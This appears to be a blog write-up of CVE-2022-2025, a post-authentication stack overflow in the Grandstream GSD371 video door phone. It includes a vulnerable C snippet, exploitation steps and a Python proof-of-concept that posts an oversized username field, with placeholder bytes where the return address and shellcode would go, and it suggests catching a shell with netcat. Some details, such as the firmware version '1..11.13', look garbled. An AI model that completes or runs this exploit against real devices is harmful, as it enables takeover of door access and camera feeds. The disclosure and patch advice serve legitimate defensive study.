In mid-2022, a critical security vulnerability was found in the Grandstream GSD371 IP video door system, specifically in firmware version 1..11.13. Registered as CVE-2022-2025, this flaw allows a remote attacker, armed with a valid username and password, to execute arbitrary code and gain full shell access. Below, we’ll break down the bug, show a proof-of-concept exploit, and explain the real risks in simple terms.
What Is Grandstream GSD371?
Grandstream’s GSD371 is a popular IP video door phone used in businesses and homes all over the world. It offers remote camera streaming, door control, and even integrations with other security devices.
Firmware Affected: 1..11.13 (and possibly others)
- Pre-requisite: Valid user credentials (username/password)
Impact: Remote Code Execution (full root shell)
The root problem is that when the user submits a certain HTTP POST parameter, the firmware uses strcpy to move the value into a stack buffer. If the value is larger than the buffer, it can overwrite control structures on the stack—such as the return address—leading to execution of arbitrary code.
Take a look at the problematic code (simplified for clarity)
// Hypothetical vulnerable function
void vulnerable_function(char *input_param) {
char buf[128];
// No length checking! Dangerous!
strcpy(buf, input_param);
// ...
}
In the real device, this function is called upon a POST request to an endpoint such as /cgi-bin/do_modify_user. The backend simply grabs a parameter (let's call it username) and stuffs it without checking into a 128-byte buffer.
CVE Record:
https://nvd.nist.gov/vuln/detail/CVE-2022-2025
Vendor Firmware Download:
https://www.grandstream.com/support/firmware
Related Exploit Discussion:
https://www.exploit-db.com/exploits/50876
Proof of Concept: Exploitation Steps
Precondition:
The attacker knows a valid username/password.
Step 1: Log In
Authenticate via the web interface or HTTP API and grab a session cookie.
Step 2: Craft Malicious Payload
You need to send a POST request to the vulnerable endpoint with an oversized parameter. The payload must:
Overflow the buffer (send more than 128 bytes)
- Overwrite the function’s return address with your controlled address (pointing to shellcode or a ROP chain)
- Add shellcode (e.g., spawns a shell via system("/bin/sh"))
Example Python Exploit
import requests
ip = "192.168.1.100" # Target device IP
login_url = f"http://{ip}/cgi-bin/login";
exploit_url = f"http://{ip}/cgi-bin/do_modify_user";
username = "admin"
password = "password123"
# Step 1: Get session
session = requests.Session()
login_data = {"username": username, "password": password}
r = session.post(login_url, data=login_data)
# Step 2: Build overflow payload
bufsize = 128
eip = b"\x90\x90\x90\x90" # Placeholder: overwrite with real address
shellcode = b"\x90" * 20 # NOP sled (add shellcode here)
payload = b"A" * bufsize + eip + shellcode
# Step 3: Send malicious payload
post_data = {"username": payload.decode('latin-1')}
resp = session.post(exploit_url, data=post_data)
print("Exploit sent, check your listener (e.g., netcat) for shell")
You’ll typically set up a netcat or Metasploit handler to catch the shell.
Note: In real-world exploitation, you’ll need to adjust eip to point to your shellcode or ROP chain, and ensure the device’s anti-exploit protections (like DEP or ASLR) are absent or bypassed. On the GSD371 (MIPS-based, no modern mitigations), this is trivial.
What This Means
With only a valid user and password, a remote attacker can own your GSD371—run their own code, install malware, listen in, or even open doors and stream feeds. Anyone using firmware 1..11.13 (or earlier) should update IMMEDIATELY.
Download the latest secure firmware from Grandstream:
Conclusion
CVE-2022-2025 is a real threat for anyone using affected Grandstream GSD371 door systems. With valid credentials, an attacker can achieve total takeover. Patch your devices, never reuse passwords, and firewall these devices from public networks.
Have questions or need help securing your IP devices? Let us know in the comments!
Timeline
Published on: 09/23/2022 16:15:00 UTC
Last modified on: 09/26/2022 22:37:00 UTC